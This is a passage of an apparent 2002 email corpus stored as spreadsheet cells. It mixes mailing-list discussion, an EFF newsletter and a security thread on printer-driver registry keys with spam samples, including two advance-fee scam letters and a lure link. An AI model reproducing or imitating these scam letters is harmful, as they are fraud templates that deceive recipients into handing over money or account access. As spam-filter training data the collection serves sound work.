 in 2001, but I haven't seen it yet on the
 census site.  Anyone have a pointer?)
 :::::::::::
 &gt; Do you punish the whole industry due to a few bad apples?
 &gt;&gt;From what little I have heard, the
 legislation simply says that lying
 in one's public figures is not just
 a matter of cheating the accounts,
 but really involves stealing time
 and money from one's employees and
 investors.  How does not tolerating
 the bad apples equate to punishing
 the good ones?
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: OSXCon Thoughts for Tuesday
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://jeremy.zawodny.com/blog/archives/000209.html
 Date: 2002-10-01T13:29:57-08:00
 I had to leave the conference after the first half of the day so that I can get 
 some stuff done at work and some work on the book. David Pogue's keynote was 
 excellent. He knows the Mac, Apple history,...
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 16 Sep 2002, Stephen D. Williams wrote:
 &gt; To make what work?  I already pointed out that a single drive is
 &gt; comparable between IDE/SCSI.
 Alas, that's wrong. Both the drives are faster (10..15 krpm vs. ~7 krpm,
 faster seek), and the EIDE protocol is ridiculously dumb (queing;
 disconnect).
 &gt; I think you're wrong with recent releases.  I'll check this week. 
 &gt; There's also JFS and XFS.
 None of them are production quality. Right now only ext2 and ext3 qualify.  
 It will take a good while (a year, or two) before we can trust anything
 else.
 &gt; &gt;SCSI has got advantages still, particular if it comes to off-shelf 
 &gt; &gt;high-density racks.
 &gt; &gt;
 &gt; Check out RaidZone.com.
 Have you looked inside a dual-CPU 1U Dell? Three drives are easy to get 
 in. Anything else would require a redesign, and would in nontrivial 
 thermal engineering issues.
 &gt; A number of vendors are putting the Promise IDE hardware on the
 &gt; motherboard.  All that remains is the proper drive socket.
 I can't think of a single major vendor who sells 1U systems with hardware
 EIDE RAID.
 &gt; Additionally, you can get hardware IDE raid as a pair of drive bays or
 &gt; even an IDE-IDEx2 controller that can be screwed into a 1U chassis.
 I believe you that stuff can be found, if one is looking for it. However, 
 I wouldn't put this into production unless I've had that system hanging in 
 the local rack under simulated load for a half a year.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: PARTNERSHIP.
</t>
  </si>
  <si>
    <t xml:space="preserve">FROM:ZIMMY MABO.
 TEL:0031-623-787-971.                   
 E-MAIL:infoeurope@lycos.com.
 THE NEDERLANDS.
          SOLICITING FOR A BUSINESS VENTURE AND PARTNERSHIP
 Before I proceed.Am greatful to introduce my self, My name is MR ZIMMY MABO a zimbabwean.I was formaly a personal aid to PRESIDENT ROBERT MUGABE,Due to my position and closeness with the President. I absconded with sum of TWENTY FIVE MILLION UNITED STATES DOLLARS (US$25,000,000)Which was part of the money meant for campaigning for president Robert Mugabe's re- election into office under Zaunpe party.Presently I have been able to move the funds diplomatically to a security company in the Netherlands. 
 MY REQUEST:I am looking for a trustworthy individual or firm to advice me in the right investment as well as to provide account where the funds will be lodge into.Moreso,I am interested in buying propertys for residence as my family will be residing there in the near future.
 COMMISSION AND REMUNERATION:As regards your commission and remuneration,I have decided to offer you 25% and also 5% for all your expenses(telephone bills, travelling expenses, hotel bills and other expenses incurred).
 NOTE: I shall commit half of my own share of the total sum into a joint venture project preferably in the purchace of real estates or other profitable business venture ,Be rest assured that you stand no risk of any kind as the funds inquestion belong to me alone, As soon as I get your conset ,I will furnish you with the details and contact of the security company where I have the funds deposited.I strongly believe that associating with you to embark on this and other business ventures will derive a huge success hereafter and it will be a long lasting business association.
  YOURS TRULY,
  MR.ZIMMY MABO.
 _____________________________________________________
 Supercharge your e-mail with a 25MB Inbox, POP3 Access, No Ads
 and NoTaglines --&gt; LYCOS MAIL PLUS.
 http://www.mail.lycos.com/brandPage.shtml?pageId=plus 
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
 Hash: SHA1
 &gt; What do you mean by "CD-Key or the like" (I presume that "of" was a
 &gt; typo)? And what do you mean by "unbreakable"?
 "of" was a typo
 Unbreakable would mean here that no one, even previously authorised entity, 
 could use the system without paying the periodic subscription fee.
 &gt; You need to be far more explicit about the problem which you wish to
 &gt; solve, and about the constraints involved.
 It could be an online system that work 95% offline but poll frequently an 
 offsite server.  No mass production CDs, maybe mass personalised d/l like Sun 
 JDK.
 Nothing is fixed yet, we are looking at the way a software can be protected 
 from unauthorized utilisation.  
 Is the use of "trusted hardware" really worth it ?  Does it really make it 
 more secure ?  Look at the DVDs.
 - -- 
 Yannick Gingras
 Coder for OBB : Obdurately Buteonine Bellwether
 http://OpenBeatBox.org
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9dRrnuv7G0DNFO+QRAk8nAKClAhTmyrUgP3ko+DEjcvj0mqfjzACgwQvo
 WZ6/CMUA23HCMZVycd7XD1Q=
 =V2G8
 -----END PGP SIGNATURE-----
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: EFFector 15.25: Judge Grants Consumer Voice in ReplayTV Lawsuit, Musician Endorses Music Sharing
</t>
  </si>
  <si>
    <t xml:space="preserve">EFFector       Vol. 15, No. 25        August 16, 2002     ren@eff.org
 A Publication of the Electronic Frontier Foundation     ISSN 1062-9424
 In the 225th Issue of EFFector:
     * Judge Grants Consumer Voice in ReplayTV Lawsuit
     * Musician Disputes Industry's Stance on Music Sharing
     * Shake Your Money Maker; EFF Is Throwing a Party Next Thursday!
     * Join the Fun at EFF's VIP Party with Wil Wheaton!
     * Court Hearing Set in DeCSS Publication Jurisdiction Case
     * Deep Links: Lawrence Lessig's Second-to-Last Speech on Copyright
     * Deep Links: The "Total Information Awareness System," or, How 
       to Build a Police State
     * Deep Links: Can the Digital Hub Survive Hollywood?
     * Administrivia
 For more information on EFF activities &amp; alerts: http://www.eff.org/
 To join EFF or make an additional donation:
   http://www.eff.org/support/
 EFF is a member-supported nonprofit. Please sign up as a member today!
 * Judge Grants Consumer Voice in ReplayTV Lawsuit
   Hollywood Tries to Skip Over Consumers' Concerns
 Los Angeles - Judge Florence Cooper today granted five ReplayTV owners
 a voice in the court debate over their rights to record television
 programs and to skip commercials using digital video recorders (DVRs).
 The federal court denied the entertainment industry motion to dismiss
 the ReplayTV owners' lawsuit and agreed to combine the consumer
 lawsuit with an entertainment industry lawsuit filed last fall to ban
 ReplayTV DVRs.
 "We're pleased the court has recognized that the debate about digital
 video recorders must include the customers who purchase and use the
 devices," said Electronic Frontier Foundation (EFF) Intellectual
 Property Attorney Robin Gross.
 "[T]he issue of whether the Newmark Plaintiffs' use of the ReplayTV
 DVRs' send-show and commercial-skipping features constitutes fair use
 will most likely figure prominently in both the ReplayTV action and
 the Newmark action," wrote Judge Cooper in her opinion.
 Responding to the entertainment industry's lawsuit against DVR
 manufacturers, EFF petitioned the court on behalf of the five ReplayTV
 owners to declare legal their use of the digital devices also known as
 personal video recorders (PVRs). EFF seeks to ensure that the legal
 debate over DVRs will include consumers' concerns along with those of
 the entertainment and consumer electronics industries.
 The entertainment industry claims that commercial skipping infringes
 copyright and digital recording aids piracy.
 "I'm not a crook if I skip commercials or share a news interview of
 myself with my mom using the SendShow feature rather than sending her
 a videotape," said Craig Newmark, founder of craigslist.org and a
 ReplayTV owner. "I shouldn't have to worry about getting prosecuted,
 but the Turner Broadcasting CEO tells us that taking a bathroom break
 is criminal. We even have Senators urging Attorney General Ashcroft to
 prosecute people who share files."
 Along with Newmark, ReplayTV customers filing the lawsuit with legal
 representation by the EFF are: Keith Ogden, owner of a financial
 broker firm in San Francisco; Shawn Hughes, a small business owner in
 Georgia; Seattle journalist Glenn Fleishman; and southern Californian
 video engineer Phil Wright.
 Links:
 For this release:
 http://www.eff.org/IP/Video/Newmark_v_Turner/20020816_eff_pr.html
 Court order denying dismissal and combining the ReplayTV cases:
 http://www.eff.org/IP/Video/Newmark_v_Turner/20020816_consolidation_granted.html
 For more information on the ReplayTV customers' suit:
 http://www.eff.org/IP/Video/Newmark_v_Turner/
 For more information on the entertainment industry's suit:
 http://www.eff.org/IP/Video/Paramount_v_ReplayTV/
 EFF Fair Use FAQ:
 http://www.eff.org/IP/eff_fair_use_faq.html
 - end -
 * Musician Disputes Industry's Stance on Music Sharing
   Janis Ian Urges Artists Speak Out, Support Free Downloads
 San Francisco - Grammy-winning songwriter and recording artist Janis
 Ian today challenged the music industry by celebrating peer-to-peer
 (P2P) music sharing as a boon to musicians.
 Ian, who is in the San Francisco Bay Area as part of her current
 concert tour, recently published "The Internet Debacle," a pointed
 critique of the music industry's disregard for musicians and consumers
 who want to distribute and acquire music online. The Electronic
 Frontier Foundation (EFF) applauds Ian's actions and hopes that others
 will see the Internet as an aid, not a threat, to musicians.
 In the article, Ian assails the major record labels' argument that P2P
 file-sharing is harming artists.
 "Free Internet downloads are good for the music industry and its
 artists," explains Ian. "Every act that can't get signed to a major,
 for whatever reason, can reach literally millions of new listeners,
 enticing them to buy the CD and come to the concerts."
 She adds that during the heyday of Napster she saw a marked increase
 in CD sales from her website. She attacks technological and political
 measures meant to harm consumers by restricting their right to copy
 and back up their legally purchased music.
 Ian will play on August 17 in San Rafael, CA.
 During her 17 album career, Ian has earned nine Grammy nominations and
 three awards. Her best known songs include 1967's "Society's Child"
 and 1975's "At Seventeen." More recently, her 1993 album "Breaking
 Silence" was nominated for a Grammy Award as Contemporary Folk Album
 of the Year. Her songs have been recorded by artists ranging from
 Bette Midler to Cher, from Glen Campbell to Vanilla Fudge, and from
 Joan Baez to Etta James.
 Links:
 For this release:
 http://www.eff.org/IP/P2P/20020815_eff_pr.html
 Janis Ian's "Internet Debacle" article:
 http://www.janisian.com/article-internet_debacle.html
 Janis Ian's follow-up article:
 http://www.janisian.com/article-fallout.html
 Janis Ian's tour information:
 http://www.janisian.com/tourinfo.html
 - end -
 * EFF CAFE 2002 - a Benefit for EFF's Campaign for Audiovisual 
   Free Expression
   Support Free Expression and See Barney-Wheaton Deathmatch
   Thursday, August 22nd, 2002/ 9pm - afterhours
 San Francisco - Join the hottest DJs of the electronic dance music
 scene, celebrity boxers, and the foremost cyberspace activists as we
 party to protect the future of music. The Electronic Frontier
 Foundation presents CAFE 2002 - a Benefit for EFF's Campaign for
 Audio-Visual Free Expression at 9 p.m. on Thursday, August 22nd, 2002
 at the DNA Lounge in San Francisco. Admission is on a sliding scale
 and begins at $10.
 The night features world-class DJs, live acts, and producers from all
 parts of the fast-growing electronic music community and a special
 treat: celebrity boxing with Wil Wheaton and Barney the purple
 dinosaur! Wil Wheaton, of Star Trek: The Next Generation and Stand By
 Me fame, will take on Barney in a celebrity boxing matchup for the
 history books. All proceeds from the event will directly benefit EFF's
 CAFE project, helping to preserve your freedom to express yourself in
 innovative ways.
 For more information, see:
 http://www.eff.org/cafe
 Or contact:
 Katina Bishop
 Director of Education and Offline Activism
 Electronic Frontier Foundation
 415-436-9333 x101
 katina@eff.org
 - end -
 * Join the Fun at EFF's VIP Party with Wil Wheaton!
 Did you love/hate him on Star Trek: The Next Generation? Did you
 laugh/cringe in sympathy at the leeches scene in Stand By Me? Need one
 last signature to round out your autograph collection of childhood
 movie stars?
 Do we even need to ask how you feel about Barney the purple dinosaur?
 RSVP quickly for the Electronic Frontier Foundation's (EFF) VIP Party
 with Wil Wheaton immediately preceding CAFE 2002: a Benefit for EFF's
 Campaign for Audio-Visual Free Expression.
 Join Wheaton and the foremost cyberspace activists for drinks in the
 upstairs room of the DNA Lounge, San Francisco's leading dance club.
 Enjoy free drinks, good company, and excellent music. Take the battle
 against Barney and his legal thugs into your own hands with a swing at
 EFF's ferocious Barney pinata.
 Former technology entrepeneur and cypherpunk Sameer Parekh, now an
 electronic musician and event promoter, will play a mix of fresh
 minimal techno and electro for your aural edification.
 All proceeds from the event will directly benefit EFF's CAFE project,
 helping to preserve your freedom to express yourself in innovative
 ways. Tickets are $50 (includes cost of CAFE 2002 and two drinks).
 When: August 22, 2002 at 8:00 p.m.
 Where: The DNA Lounge 375 Eleventh Street, San Francisco, CA 94103
 21+ w/ID, NO EXCEPTIONS
 To reserve your ticket, contact:
 Katina Bishop
 EFF Education Director
 415-436-9333 x101
 katina@eff.org
 - end -
 * Court Hearing Set in DeCSS Publication Jurisdiction Case
 On September 5, 2002, the California Supreme Court will hear oral
 arguments about whether a California court has jurisdiction over
 Matthew Pavlovich, an Indiana college student who is a resident of
 Texas, for his hosting of an Internet mailing list. Pavlovich
 maintained the mailing list for the LiVid programming group, which
 provides a unified development and user resource center for video and
 DVD-related work for the Linux operating system. One of the group's
 projects was to create a DVD player for computer systems that run
 Linux. As part of that effort, DeCSS, a program that decrypts the copy
 protection on DVDs, was published on the group's mailing list. The
 entertainment industry has sued Pavlovich in California court, and
 last year a California appellate court ruled Pavlovich was within the
 state court's jurisdiction since he published information that relates
 to the entertainment industry, which is based in California.
 EFF and Pavlovich's legal team argue that Pavlovich is outside of
 California's jurisdiction since he was a college student in Indiana
 with no contacts to California when DeCSS was published on the LiVid
 list. The hearing on September 5 will take place in San Francisco.
 Links:
 For more info on the case:
 http://www.eff.org/IP/DVDCCA_case/
 - end -
 Deep Links
 Deep Links is a new department in the EFFector featuring noteworthy
 news items, victories and threats from around the Internet.
 * Lawrence Lessig's Second-to-Last Speech on Copyright
 Lawrence Lessig gave one of his last public speeches on copyright at
 the O'Reilly Open Source Conference. He will be taking time off of the
 speaking circuit to prepare for the Eldred v. Archroft case, which he
 is arguing before the Supreme Court this fall. Copies of the speech
 are available in many formats here:
 http://randomfoo.net/oscon/2002/lessig/
 - end -
 * The "Total Information Awareness System"
 A colorful diagram of John Poindexter's scary plan to eliminate
 terrorists.
 http://www.darpa.mil/iao/TIASystems.htm
 - end -
 * Can the Digital Hub Survive Hollywood?
 Cory Doctorow on how innovation and technology suffer at the hands of
 the content industry.
 http://www.tidbits.com/database-cache/tbart06901.html
 - end -
 * Administrivia
 EFFector is published by:
 The Electronic Frontier Foundation
 454 Shotwell Street
 San Francisco CA 94110-1914 USA
 +1 415 436 9333 (voice)
 +1 415 436 9993 (fax)
   http://www.eff.org/
 Editor:
 Ren Bucholz, Activist
   ren@eff.org
 To Join EFF online, or make an additional donation, go to:
   http://www.eff.org/support/
 Membership &amp; donation queries: membership@eff.org
 General EFF, legal, policy or online resources queries: ask@eff.org
 Reproduction of this publication in electronic media is encouraged.
 Signed articles do not necessarily represent the views of EFF. To
 reproduce signed articles individually, please contact the authors for
 their express permission. Press releases and EFF announcements &amp;
 articles may be reproduced individually at will.
 To change your address, plese visit http://action.eff.org/subscribe/.
 &gt;&gt;From there, you can update all your information. If you have already
 subscribed to the EFF Action Center, please visit
 http://action.eff.org/action/login.asp.
 (Please ask ren@eff.org to manually remove you from the list if this
 does not work for you for some reason.)
 Back issues are available at:
   http://www.eff.org/effector
 To get the latest issue, send any message to
 effector-reflector@eff.org (or er@eff.org), and it will be mailed to
 you automatically. You can also get it via the Web at:
   http://www.eff.org/pub/EFF/Newsletters/EFFector/current. html
 ++++++++++++++++++++++++
 You received this message because eff-all@eff.org is a member of the 
 mailing list originating from alerts@action.eff.org. To unsubscribe 
 from all mailing lists originating from alerts@action.eff.org, send an 
 email to alerts@action.eff.org with 'Remove' as the only text in the 
 subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] please kindly get back to me
</t>
  </si>
  <si>
    <t xml:space="preserve">
 FROM:MR. DESMOND STEVENS
                      URGENT ASSISTANCE. 
 YOU MAY BE SURPRISED TO RECEIVE THIS LETTER FROM ME SINCE YOU DO NOT KNOW ME PERSONALLY. I AM MR.DESMOND STEVENS, THE FIRST SON OF DR. DENNIS STEVENS, WHO WAS RECENTLY MURDERED IN THE LAND DISPUTE IN ZIMBABWE. I WAS FURNISHED WITH VIABLE INFORMATION FROM THE WORLD TRADE CENTRE HERE IN AMSTERDAM, THE NETHERLANDS AND DECIDED TO WRITE YOU. 
 BEFORE THE DEATH OF MY FATHER, HE HAD TAKEN ME TO AMSTERDAM TO DEPOSIT THE SUM OF TEN MILLION,FIVE HUNDRED THOUSAND UNITED STATES DOLLARS (US$10,500,000) IN A SECURITY COMPANY, AS IF HE FORESAW THE LOOMING DANGER IN ZIMBABWE. THIS MONEY WAS DEPOSITED IN A BOX AS GEMSTONES TO AVOID MUCH DEMURRAGE FROM THE SECURITY COMPANY. THIS AMOUNT WAS MEANT FOR THE PURCHASE OF NEW MACHINES AND CHEMICALS FOR THE FARMS AND ESTABLISHMENT OF NEW FARM IN SWAZILAND. THIS LAND PROBLEM CAME WHEN ZIMBABWE PRESIDENT MR. ROBERT MUGABE, INTRODUCED A NEW LAND ACT THAT WHOLLY AFFECTED RICH WHITE FARMERS AND SOME FEW BLACK FARMERS. THIS RESULTED TO THE KILLING AND MOB ACTION BY ZIMBABWE WAR VETERANS AND SOME LUNATICS IN THE SOCIETY. INFACT, A LOT OF PEOPLE WERE KILLED BECAUSE OF THIS LAND REFORM ACT OF WHICH MY FATHER WAS ONE OF THE VICTIMS. IT IS AGAINST THIS BACKGROUND THAT MY FAMILY AND I WHO ARE CURRENTLY STAYING IN AMSTERDAM DECIDED TO TRANSFER MY FATHERS MONEY TO 
  A FOREIGN ACCOUNT. SINCE THE LAW OF THE NETHERLANDS PROHIBIT A REFUGEE (ASYLUM SEEKER) TO OPEN ANY ACCOUNT OR TO BE INVOLVED IN ANY FINANCIAL TRANSACTION. 
 AS THE ELDEST SON OF MY FATHER, I AM SADDLED WITH THE RESPONSIBILITY OF SEEKING A GENUINE FOREIGN ACCOUNT WHERE THIS MONEY COULD BE TRANSFERRED WITHOUT THE KNOWLEDGE OF MY GOVERNMENT WHO ARE BENT ON TAKING EVERYTHING WE HAVE GOT. I AM FACED WITH THE DILEMMA OF INVESTING THIS AMOUNT OF MONEY IN THE NETHERLANDS FOR THE FEAR OF GOING THROUGH THE SAME EXPERIENCE IN FUTURE SINCE BOTH COUNTRIES HAVE SIMILAR HISTORY. MOREOVER, THE NETHERLANDS FOREIGN EXCHANGE POLICY DOES NOT ALLOW SUCH INVESTMENT FROM ASYLUM SEEKERS. AS A BUSINESSMAN, WHOM I HAVE ENTRUSTED MY FUTURE AND MY FAMILY IN HIS HANDS, I MUST LET YOU KNOW THAT THIS TRANSACTION IS RISK FREE. IF YOU ACCEPT TO ASSIST ME AND MY FAMILY, ALL I NEED YOU TO DO FOR ME IS TO MAKE ARRANGEMENT AND COME TO AMSTERDAM, THE NETHERLANDS SO THAT YOU CAN OPEN THE NON-RESIDENT ACCOUNT WHICH WILL AID US IN TRANSFERRING THE MONEY INTO ANY ACCOUNT YOU WILL NOMINATE OVERSEAS. THIS MONEY I INTEND TO USE FOR INVESTMENT. I HAVE
   OPTIONS TO OFFER YOU, FIRST YOU CAN CHOOSE TO HAVE CERTAIN PERCENTAGE OF THE MONEY FOR NOMINATING YOUR ACCOUNT FOR THE TRANSACTION, OR YOU CAN GO INTO PARTNERSHIP WITH ME FOR A PROPER PROFITABLE INVESTMENT OF THE MONEY IN YOUR COUNTRY. WHICHEVER OPTION YOU CHOOSE, FEEL FREE TO NOTIFY ME. I HAVE MAPPED OUT 5% OF THIS MONEY FOR ALL EXPENSES INCURRED IN PROCESSING THIS TRANSACTION. IF YOU DO NOT PREFER A PARTNERSHIP, I AM WILLING TO GIVE YOU 25% OF THE MONEY WHILE THE REMAINING 70% THAT IS MEANT FOR ME, WILL BE FOR THE INVESTMENT IN YOUR COUNTRY. 
 PLEASE, CONTACT ME WITH THE ABOVE TELEPHONE AND E-MAIL ADDRESS, WHILE I IMPLORE YOU TO MAINTAIN THE ABSOLUTE SECRECY REQUIRED IN THE TRANSACTION. 
 YOURS FAITHFULLY, 
 DESMOND STEVENS. 
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 23 Jul 2002, Tabor J. Wells wrote:
 &gt;Razor/Client.pm is part of Razor v1. You've installed Razor v2.
 &gt;Spamassassin's current release only works with v1. Although IIRC
 &gt;the current CVS code works with v2.
 Thanks, Tabor.  How do I install v1 over v2, and where does one
 get it?  (I don't see it at razor.sourceforge.net)
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Welcome, Danny and Quinn!
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85534853
 Date: Not supplied
 This time around, we have _two, two, two_ Guestbloggers for the price of one. 
 Quinn Norton and Danny O'Brien have agreed to fill the sidebar slot for a 
 little while. Danny and Quinn and their rommie Gilbert are just about the most 
 fun Bay Areans I've had the pleasure of hanging out with. Between the three of 
 them, they're capable of being entertaining on the subjects of Python, 
 copyright, pottery, usability (a conversation with Quinn about usability made 
 it, almost verbatim, into my second novel "Eastern Standard Tribe"), 
 load-balancing, free software, nerd culture, British cuisine, bodily ailments, 
 pregnancy... Well, you name it. I can't wait to see what they post! Discuss[1]
 [1] http://www.quicktopic.com/boing/H/NYtiY2fGTe3iE
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A rare and wonderful email really!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi we are luke's secret following we love luke fictitious!
 We are also your long lost friend! Hi
 This email has nothing to do with lukefictitious.com
 We wil be putting up our very own fan site soon
 and wanted to let you know in advance!
 Have a beautifull day!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Bug ... still
</t>
  </si>
  <si>
    <t xml:space="preserve">Haven't heard anything about this, so excuse the repost but:
 	http://sf.net/tracker/index.php?func=detail&amp;aid=600311&amp;
 	  group_id=3978&amp;atid=103978
 Or should bugs be reported somewhere other than on the SF bug tracker?
 - Colin
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
  (Pamela@Blinkese.com) on Thursday, July 25, 2002 at 01:23:03
 ---------------------------------------------------------------------------
 : &lt;font size=5&gt;&lt;br&gt;&lt;br&gt;
 Hey wassup my names mandy, I got this new webpage, Im trying to see if things look alright before i publish it. Can you come and check it out for me!&lt;br&gt;&lt;br&gt;
 &lt;a href="http://www.iteensz.us.tt"&gt;Check it out!&lt;/a&gt;
 ---------------------------------------------------------------------------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</si>
  <si>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 Buy? (was Re: It's back? Triple-digit Dow gains at 2PM...)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, 25 Jul 2002, R. A. Hettinga wrote:
 &gt; So, in light of the erstwhile bloodbath on Capital Hill, and the real
 &gt; one we just saw a few days ago in the market, it may be time for
 &gt; people to remember what Mr. Rothschild said, and buy now while
 &gt; there's blood in the streets.
 Luckily, I'm in no such predilection as technolumpen.
 However, the signs do seem to head for a much deeper crapper than the one
 we're currently in, and this has relevance to those switching jobs, or
 those just entering the job market. Nano/bio startups are all screwed up,
 alas. It's too early to wait for the radioactive glass to cool down while
 the nukes are still going off, imo.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">This situation wouldn't have happened in the first place if California
 didn't have economically insane regulations.  They created a regulatory
 climate that facilitated this.  So yes, it is the product of
 over-regulation.
 -James Rogers
  jamesr@best.com
 On Tue, 2002-09-24 at 05:17, Geege Schuman wrote:
 &gt; from slate's "today's papers":  
 &gt; The New York Times and Los Angeles Times both lead with word that
 &gt; a federal judge ruled yesterday that the nation's largest
 &gt; national gas pipeline company, El Paso, illegally withheld gas
 &gt; from the market during California's energy squeeze in 2000-01.
 &gt; The judge concluded that El Paso left 21 percent of its capacity
 &gt; in the state off-line, thus driving up the price of gas and
 &gt; helping to induce rolling blackouts. 
 &gt; 
 &gt; and this is the product of overregulation?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: The risks of client systems writing to server registry
</t>
  </si>
  <si>
    <t xml:space="preserve">On 5 Sep 2002, Richard Bartlett wrote:
 Richard,
 &gt; I have a customer who is developing some printer driver code to allow 
 &gt; custom driver settings (n-up, booklet, duplex etc.) to be saved up to the 
 &gt; server to be retrieved by other users.   The data is being written, by a 
 &gt; printer driver (using the logged on users authentication, to a registry 
 &gt; key) HKLM\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows NT 
 &gt; x86\Drivers\Version-3\{Driver Name}\{Custom Key}\Subkey).
 Let me get this straight; a registry key is loaded from the server onto 
 the client workstations who can modify it, then write it back onto the 
 server's own registry - which is not going to use it?
 &gt; The question is, what are the security risks of allowing users to write 
 &gt; to this key?  The data is string data, in the form of delimited numeric 
 &gt; values.  This data is then retrieved by capable printer drivers and 
 &gt; interpreted.
 &gt; 
 &gt; The risks as I see it are twofold;
 &gt; (1) The risks of a compromise to the server using this registry key.  I 
 &gt; think this is unlikeley as the server itself does not use this data, only 
 &gt; client PC's do.  Unless someone knows a way to travel out of a hive up 
 &gt; the registry bypassing the permissions set using regedt32.
 What is the reason to write a registry key to a server if the server 
 itself is not using it?
 I don't think you should worry too much about someone travelling out of 
 the hive, but again, I'm curious as to how the driver actually modifies 
 the keys on the server.
 &gt; (2) The risks of a compromise to the client (far more likely).  This 
 &gt; would probably be by a malformed or extremely long string in the key 
 &gt; value, which would presumably lead to either DOS or system compromise by 
 &gt; buffer overflow on the client system.
 And if the client writes the key back onto the server, yes, there's wide 
 open for something nasty here.
 Two other things spring to mind; 
 1) If anyone can modify the key, how do you make sure that two users are 
 not overwriting the same key, thereby causing undesirable effects.
 2) If anyone have permissions to write to the key (and below), anyone can 
 create thousands of extra keys under this key, thereby filling up the 
 registry. The result of such a thing is obvious.
 If I got this all wrong, I'd be happy that you clarify a bit more and tell 
 me where I might have misunderstood.
 Med venlig hilsen / Best regards,
 -Allan Jensen
 Si hoc signum legere potes, operis boni in rebus Latinus alacribus et 
 fructuosis potiri potes!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 804] Razor debugging isn't functioning
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=804
 jm@jmason.org changed:
            What    |Removed                     |Added
 ----------------------------------------------------------------------------
              Status|NEW                         |RESOLVED
          Resolution|                            |FIXED
 ------- Additional Comments From jm@jmason.org  2002-09-02 14:58 -------
 ok, now in.
 ------- You are receiving this mail because: -------
 You are the assignee for the bug, or are watching the assignee.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</si>
  <si>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NEW TECHNOLOGY - DIGITAL VIDEO RECORDER (Smart IP Technology)
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_lBwzzJ0s7cGEidV47B
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_lBwzzJ0s7cGEidV47BAA"
 ------=_NextPart_lBwzzJ0s7cGEidV47BAA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQo8aGVhZD4NCjx0aXRsZT5TZWN1cmVQcm8gRFZSPC90aXRsZT4NCjxtZXRhIGh0dHAt
 ZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5
 LTEiPg0KPC9oZWFkPg0KDQo8Ym9keSBiZ2NvbG9yPSIjRkZGRkZGIiB0ZXh0PSIjMDAwMDAwIiBs
 aW5rPSIjRkZGRkZGIiB2bGluaz0iI0ZGRkZGRiIgYWxpbms9IiNGRkZGRkYiPg0KPGRpdiBhbGln
 bj0ibGVmdCI+PC9kaXY+DQo8dGFibGUgd2lkdGg9IjY1NCIgYm9yZGVyPSIxIiBjZWxsc3BhY2lu
 Zz0iMCIgY2VsbHBhZGRpbmc9IjAiIGJvcmRlcmNvbG9yPSIjMDAwMEZGIj4NCiAgPHRyPiANCiAg
 ICA8dGQgaGVpZ2h0PSIxMTAxIiB2YWxpZ249InRvcCI+IA0KICAgICAgPGRpdiBhbGlnbj0iY2Vu
 dGVyIj48L2Rpdj4NCiAgICAgIDx0YWJsZSB3aWR0aD0iNjgwIiBib3JkZXI9IjAiIGNlbGxzcGFj
 aW5nPSIwIiBjZWxscGFkZGluZz0iMCI+DQogICAgICAgIDx0cj4gDQogICAgICAgICAgPHRkIGhl
 aWdodD0iNDMiIGJnY29sb3I9IiMwMDAwRkYiPiANCiAgICAgICAgICAgIDxkaXYgYWxpZ249ImNl
 bnRlciI+PGZvbnQgZmFjZT0iVmVyZGFuYSwgQXJpYWwsIEhlbHZldGljYSwgc2Fucy1zZXJpZiIg
 Y29sb3I9IiNGRkZGRkYiIHNpemU9IjUiPjxiPkRJR0lUQUwgDQogICAgICAgICAgICAgIFZJREVP
 IFJFQ09SREVSIEpLLTQwMDwvYj48L2ZvbnQ+PC9kaXY+DQogICAgICAgICAgPC90ZD4NCiAgICAg
 ICAgPC90cj4NCiAgICAgIDwvdGFibGU+DQogICAgICA8ZGl2IGFsaWduPSJjZW50ZXIiPiANCiAg
 ICAgICAgPHRhYmxlIHdpZHRoPSI2ODAiIGJvcmRlcj0iMCIgY2VsbHNwYWNpbmc9IjAiIGNlbGxw
 YWRkaW5nPSIwIj4NCiAgICAgICAgICA8dHI+IA0KICAgICAgICAgICAgPHRkIHJvd3NwYW49IjMi
 IGFsaWduPSJjZW50ZXIiIHdpZHRoPSIyNTgiIHZhbGlnbj0ibWlkZGxlIj48aW1nIHNyYz0iaHR0
